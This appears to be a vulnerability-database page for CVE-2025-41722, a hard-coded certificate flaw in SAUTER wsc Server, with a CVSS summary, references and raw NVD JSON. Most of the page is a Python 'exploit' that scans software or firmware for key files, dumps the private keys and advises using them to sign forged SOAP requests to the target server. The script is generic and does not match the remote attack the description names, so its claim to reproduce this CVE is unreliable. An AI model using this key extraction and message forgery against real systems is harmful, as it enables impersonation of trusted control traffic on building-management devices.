CVE-2025-41722

Description

The wsc server uses a hard-coded certificate to check the authenticity of SOAP messages. An unauthenticated remote attacker can extract private keys from the Software of the affected devices.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAUTER wsc Server（具体受影响版本请参考官方安全公告 vde-2025-060）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-41722 - SAUTER wsc Server Hard-coded Certificate Private Key Extraction
# This PoC demonstrates extraction of hard-coded private keys from the affected software

import os
import sys
import zipfile
import tarfile
import OpenSSL.crypto as crypto

def search_files(root_path, extensions):
    """Recursively search for certificate and key files"""
    found_files = []
    for dirpath, dirnames, filenames in os.walk(root_path):
        for filename in filenames:
            for ext in extensions:
                if filename.endswith(ext):
                    found_files.append(os.path.join(dirpath, filename))
    return found_files

def extract_private_key(key_file, password=None):
    """Extract private key from a file"""
    try:
        with open(key_file, 'rb') as f:
            key_data = f.read()
        
        # Try PEM format
        try:
            if password:
                pkey = crypto.load_privatekey(crypto.FILETYPE_PEM, key_data, password)
            else:
                pkey = crypto.load_privatekey(crypto.FILETYPE_PEM, key_data)
            return crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey)
        except Exception:
            pass
        
        # Try DER format
        try:
            pkey = crypto.load_privatekey(crypto.FILETYPE_ASN1, key_data)
            return crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey)
        except Exception:
            pass
        
        # Try PKCS12 format
        try:
            p12 = crypto.load_pkcs12(key_data, password)
            return crypto.dump_privatekey(crypto.FILETYPE_PEM, p12.get_privatekey())
        except Exception:
            pass
            
        return None
    except Exception as e:
        print(f"Error processing {key_file}: {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <path_to_software_or_firmware>")
        sys.exit(1)
    
    target_path = sys.argv[1]
    extensions = ['.pem', '.key', '.p12', '.pfx', '.der', '.cer', '.crt', '.jks']
    
    print(f"[*] Searching for certificate/key files in: {target_path}")
    found = search_files(target_path, extensions)
    
    if not found:
        print("[!] No certificate or key files found.")
        sys.exit(1)
    
    print(f"[*] Found {len(found)} potential certificate/key files")
    
    for f in found:
        print(f"\n[*] Analyzing: {f}")
        key_pem = extract_private_key(f)
        if key_pem:
            output = f + ".extracted_key.pem"
            with open(output, 'wb') as out:
                out.write(key_pem)
            print(f"[+] Private key extracted to: {output}")
            print("[!] This key can be used to forge SOAP messages to the wsc server")

if __name__ == "__main__":
    main()

# Usage example:
# python3 exploit.py /path/to/sauter_wsc_software/
# After extracting the key, use it to sign SOAP requests to the target wsc server

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41722
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41722
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41722/
[4] VulDB https://vuldb.com/cve/CVE-2025-41722
[5] https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41722", "sourceIdentifier": "[email protected]", "published": "2025-10-22T07:15:33.640", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The wsc server uses a hard-coded certificate to check the authenticity of SOAP messages. An unauthenticated remote attacker can extract private keys from the Software of the affected devices."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json", "source": "[email protected]"}]}}